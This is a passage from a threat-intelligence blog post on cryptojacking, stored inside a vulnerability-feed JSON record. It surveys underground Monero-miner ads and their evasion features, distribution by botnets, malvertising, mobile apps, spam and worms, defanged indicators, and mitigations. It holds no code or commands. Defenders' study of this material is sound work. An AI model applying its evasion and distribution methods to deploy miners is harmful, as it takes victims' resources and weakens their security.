encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T14:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape:\nThe Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T14:00:00", "id": "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source 